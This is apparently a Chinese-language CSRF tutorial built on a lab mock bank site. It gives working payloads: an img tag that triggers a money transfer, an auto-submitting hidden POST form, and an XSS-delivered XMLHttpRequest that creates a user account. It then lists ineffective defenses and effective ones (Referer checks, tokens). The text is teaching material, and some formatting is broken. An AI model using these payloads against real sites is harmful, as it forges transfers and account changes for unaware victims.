跨站请求伪造CSRF

目录

1跨站请求伪造概述

基本概念

关键点

⽬标

2CSRF 的场景复现

 构造CSRF攻击连接

​

 CSRF场景建模

 3CSRF的类别

POST ⽅式

4与XSS漏洞相结合

XSS和CSRF区别

 5CSRF漏洞的防御

无效的防御

有效的防御

---

1跨站请求伪造概述

hacker ⽤户可以伪造admin ⽤户的转账请求，强制admin ⽤户，转账给任意⽤户

基本概念

        跨站请求伪造（Cross Site Request Forgery,CSRF） 。

        CSRF 是⼀种攻击，它强制终端⽤户在当前对其进⾏身份验证后的Web 应⽤程序上执⾏⾮本意操作的攻 击。

        CSRF 攻击的重点在于更改状态的请求，⽽不是盗取数据，因为攻击者⽆法查看伪造请求的响应。         

        借助于社⼯的⼀些帮助，例如，通过电⼦邮件或聊天发送链接，攻击者可以诱骗⽤户执⾏攻击者选择的 操作。如果受害者是普通⽤户，则成功的CSRF 攻击可以强制⽤户执⾏更改状态的请求，例如转移资 ⾦、修改密码等操作。如果受害者是管理账户，CSRF 攻击会危及整个Web 应⽤程序。

关键点

   

   # # 受害者没有退出登录

        CSRF 是⼀种欺骗受害者提交恶意请求的攻击。它继承了受害者的身份和特权，代表受害者执⾏⾮本意 的、恶意的操作。

        对于⼤多数站点，浏览器请求会⾃动发送与站点关联的所有凭据，例如⽤户的会话Cookie，IP 地址， Windows 域凭据等。因此，如果⽤户已对当前站点进⾏了身份验证，则该站点没有办法区分⼀个请求 是受害者发送的合法请求还是攻击者伪造受害者身份发送的⾮法请求。

⽬标

        CSRF 的⽬标是更改⽤户账户的状态，攻击者利⽤CSRF 发送的请求都是更改状态的请求，⽐如，转账、 更改密码，购买商品等等。 CSRF 的场景中，攻击者是没有办法获得服务器的响应

2CSRF 的场景复现

        # 模拟银行网站

http://192.168.52.138/bank/self.php

        #恶意网站

http://192.168.52.138/csrf/get.html

 构造CSRF攻击连接

<img src='./1.jpg'><br />
<img src='http://192.168.16.109/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93' alt='宝⼑在⼿，谁与争锋'>

        通过 标签构造GET 请求。这个GET 请求来⾃于受害者的浏览器，是⽤户发起的转账请求。         受害者访问⽹站的时候加载了 标签。浏览器会根据 标签中的 SRC 属性，请求服务器资源 （GET ），会⾃动带上身份认证信息（Cookie）。

 

 CSRF场景建模

 3CSRF的类别

POST ⽅式

<meta charset='utf-8'>
<form name='csrf' action='http://192.168.16.113/bank/action.php'
method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--
<a href='javascript:document.csrf.submit()' style='color:red;fontsize:100px'>宝⼑在⼿，谁与争锋</a>
<br />

4与XSS漏洞相结合

XSS和CSRF区别

XSS：把代码注入到网页中，由网页执行JS代码

CSRF：WEB服务器没有对请求做验证，攻击者可以伪造受害者的请求，继承受害者身份特权，向服务器其发送请求。

        攻击者可以利⽤XSS 触发CSRF 攻击。因为，可以利⽤JS 发送HTTP 请求。

         经过研究受害⽹站的业务流程，可以构造如下代码

xmlhttp = new XMLHttpRequest();
xmlhttp.open('post','./user.action.php',false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send('act=add&username=ajest&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0');

 

 5CSRF漏洞的防御

无效的防御

        #使⽤秘密的Cookie

        #仅接收POST 请求

        #多步交易

多步交易，有可能会被恶意攻击者预测

        #URL 重写

用户的身份信息会暴露在URL 中
不建议通过引⼊另外⼀个漏洞来解决当前漏洞

        #HURL 重写

所有安全机制的前提。

有效的防御

        #验证Referer

当前URL 的上⼀个URL
是否可以伪造？

        #添加Token 验证

一串随机字符串
每⼀次客户端的请求，服务器都要刷新Token
服务器创建了⼀个Token 值，存储在服务器中并且下发到浏览器
下次浏览器请求，需要提交该Token 值，服务器根据浏览器提交的Token 与服务器中存储的Token
进⾏⽐对
如果⼆者⼀致，说明请求是正常业务流程。
如果⼆者不⼀致，说明请求有可能来⾃于恶意的攻击者。
Token 的设计，在PHP 中通常利⽤SESSION 机制来实现。